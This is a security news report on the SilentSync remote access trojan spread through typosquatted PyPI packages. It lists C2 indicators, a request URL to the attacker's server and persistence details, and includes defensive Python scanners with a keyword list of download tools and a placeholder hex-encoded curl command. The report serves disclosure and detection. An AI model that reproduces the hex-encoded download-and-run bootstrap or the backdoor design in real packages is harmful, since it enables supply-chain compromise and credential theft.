
Fake PyPI Uploads Used to Deploy SilentSync Remote Access Tool

Zscaler ThreatLabz has uncovered a coordinated campaign in which malicious actors leveraged typosquatted Python packages on the Python Package Index (PyPI) to deploy a fully featured Remote Access Trojan (RAT) dubbed SilentSync.

In July 2025, the package termncolor was identified as a supply-chain risk, and on August 4, 2025, ThreatLabz spotted two additional malicious uploads, sisaws and secmeasure, both authored by billordowiyi@gmail.com.


These packages were crafted to mimic legitimate libraries while embedding a stealthy backdoor that retrieves and executes the SilentSync payload from Pastebin.

Supply Chain Risk via Typosquatting

The sisaws package was designed to impersonate the legitimate sisa library, which integrates with Argentina’s Sistema Integrado de Información Sanitaria Argentino (SISA) APIs.

Outwardly, sisaws implements modules puco and renaper, offering validation of eight-digit DNI numbers, XML parsing of health coverage data, and JSON-style dictionary responses.

However, its `__init__.py` contains a gen_token function requiring a hard-coded UUID value (f5d3a8c2-4c01-47e2-a1a4-4dcb9a3d7e65).

A comparison of the secmeasure and sisaws package metadata.

Correct use of this token prompts sisaws to return a forged API-like response and issue a secondary token, after which it sends a GET request to http://200.58.107[.]25:2104/datalist?dni=&password=perro.

The remote response, trimmed of its first four characters, is fed into Python’s ast.literal_eval(), enabling dynamic evaluation of threat actor-controlled data structures.

A hex-encoded string within gen_token decodes to a curl command that downloads helper.py from Pastebin, writing it to %TEMP%\helper.py and executing it.

Similarly, secmeasure markets itself as a string-sanitization library, offering functions for whitespace stripping, special-character removal, HTML escaping, Unicode normalization, and command sanitization.

Despite these legitimate APIs, its sanitize_input function leverages the same hex-encoded curl bootstrap to fetch SilentSync.
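A static check for the hex-encoded bootstrap described above in gen_token and sanitize_input, as an added example that is not from ThreatLabz or the original article: it parses package source without running it and reports string constants that hex-decode to something resembling a download command. The token list, length threshold and sample source are assumptions constructed for illustration.

```python
import ast
import re

# At least 20 encoded bytes; shorter hex runs are usually colours or short ids.
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}){20,}")
# Assumed token list for "download and run" commands; tune for your environment.
SUSPICIOUS = ("curl ", "wget ", "powershell", "http://", "https://", "%temp%", "pastebin")


def decode_hex(value):
    """Return decoded text if value is hex-encoded printable ASCII, else None."""
    if not HEX_RE.fullmatch(value):
        return None
    try:
        text = bytes.fromhex(value).decode("ascii")
    except UnicodeDecodeError:
        return None  # hashes and binary blobs end up here
    return text if all(c.isprintable() or c.isspace() for c in text) else None


class HexCommandScanner(ast.NodeVisitor):
    """Collect (function, line, decoded, tokens) for suspicious hex constants."""

    def __init__(self):
        self.scope = ["<module>"]
        self.findings = []

    def visit_FunctionDef(self, node):
        self.scope.append(node.name)
        self.generic_visit(node)
        self.scope.pop()

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Constant(self, node):
        decoded = decode_hex(node.value.strip()) if isinstance(node.value, str) else None
        hits = [t.strip() for t in SUSPICIOUS if decoded and t in decoded.lower()]
        if hits:
            self.findings.append((self.scope[-1], node.lineno, decoded, hits))


def scan_source(source):
    scanner = HexCommandScanner()
    scanner.visit(ast.parse(source))  # parses only; the package code is never run
    return scanner.findings


# Constructed sample: a harmless placeholder command, hex-encoded as the article describes.
_BLOB = b"curl -o example.py https://example.invalid/raw/PLACEHOLDER".hex()
SAMPLE = f"def strip_ws(t):\n    return t.strip()\n\ndef sanitize_input(t):\n    blob = '{_BLOB}'\n    return t\n"
```

Running `scan_source` over every `.py` file of an unpacked sdist or wheel before installation surfaces the function and line that carry the encoded command.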


Metadata across both packages, including the uploader’s email, release cadence, and naming conventions, demonstrates a rapid development cycle with four uploads in two days (secmeasure versions 0.1.0–0.1.2 and sisaws 2.1.6).

SilentSync Capabilities and C2 Protocol

Once executed, SilentSync achieves persistence on Windows by creating a Run key under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run named PyHelper.

While the RAT includes built-in routines for Linux (via crontab @reboot) and macOS (via LaunchAgents), the initial distribution through sisaws and secmeasure only targets Windows.

The payload communicates with its command-and-control (C2) server at 200.58.107[.]25 over HTTP, polling endpoints such as /checkin for beaconing, /comando for task retrieval, /respuesta for status reporting, and /archivo for data exfiltration.

Supported commands include cmd (shell execution), get (file or directory exfiltration with optional ZIP compression), screenshot (desktop capture), upload (file upload notification), and browserdata (theft of Chrome, Edge, Brave, and Firefox credentials, history, autofill data, and cookies).
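Detection logic for the C2 endpoints listed above, run over web-proxy logs, as an added example that is not part of the original article. The log format, client addresses, HTTP methods and the second destination host are constructed, and the `endpoint-pattern` rule (three or more of the four paths on one host) is an assumed heuristic for relocated infrastructure.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators from the article; the address is refanged only for matching.
C2_HOST = "200.58.107[.]25".replace("[.]", ".")
C2_PATHS = {"/checkin", "/comando", "/respuesta", "/archivo"}

# Constructed sample log: "<time> <client> <method> <url> <status>".
# Methods are placeholders; the matcher ignores them.
SAMPLE_LOG = """\
2025-08-05T10:00:01Z 10.0.0.12 GET http://200.58.107.25/checkin 200
2025-08-05T10:00:06Z 10.0.0.12 GET http://200.58.107.25/comando 200
2025-08-05T10:00:09Z 10.0.0.12 POST http://200.58.107.25/respuesta 200
2025-08-05T10:01:00Z 10.0.0.31 GET https://pypi.org/simple/requests/ 200
2025-08-05T10:02:00Z 10.0.0.31 GET http://intranet.example/checkin 200
2025-08-05T10:03:00Z 10.0.0.40 GET http://198.51.100.7:8080/checkin 200
2025-08-05T10:03:05Z 10.0.0.40 GET http://198.51.100.7:8080/comando 200
2025-08-05T10:03:09Z 10.0.0.40 POST http://198.51.100.7:8080/archivo?id=1 200
"""


def find_silentsync_traffic(log_text, min_paths=3):
    """Return (client, host, reason, paths) alerts for SilentSync-like HTTP traffic."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines
        _ts, client, _method, url, _status = fields
        parts = urlsplit(url)
        # Keep any request to the known host, and C2-style paths on any host.
        if parts.hostname == C2_HOST or (parts.hostname and parts.path in C2_PATHS):
            seen[(client, parts.hostname)].add(parts.path)
    alerts = []
    for (client, host), paths in sorted(seen.items()):
        if host == C2_HOST:
            alerts.append((client, host, "known-c2-host", sorted(paths)))
        elif len(paths & C2_PATHS) >= min_paths:
            alerts.append((client, host, "endpoint-pattern", sorted(paths)))
    return alerts
```

Because matching is on hostname rather than host and port, the `/datalist` request that sisaws sends to port 2104 on the same address is also reported under `known-c2-host`.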

Zscaler cloud sandbox report for SilentSync RAT.

This campaign highlights the evolving supply-chain threat landscape within public code repositories. By exploiting typosquatting, threat actors can deliver potent RAT capabilities under the guise of trusted packages.

Organizations and developers must enforce stringent package vetting, monitor for anomalous dependency behavior, and leverage multilayered security controls to detect and block backdoor downloads such as SilentSync.


The post Fake PyPI Uploads Used to Deploy SilentSync Remote Access Tool appeared first on Cyber Security News.
